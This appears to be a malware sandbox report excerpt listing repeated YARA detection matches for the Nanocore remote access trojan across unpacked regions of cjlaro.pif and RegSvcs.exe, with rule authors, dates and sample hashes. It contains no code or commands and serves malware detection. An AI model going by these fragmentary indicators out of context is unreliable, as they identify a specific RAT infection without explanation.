    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.2a6cd70.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.2a6cd70.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.2a67f10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.2a67f10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
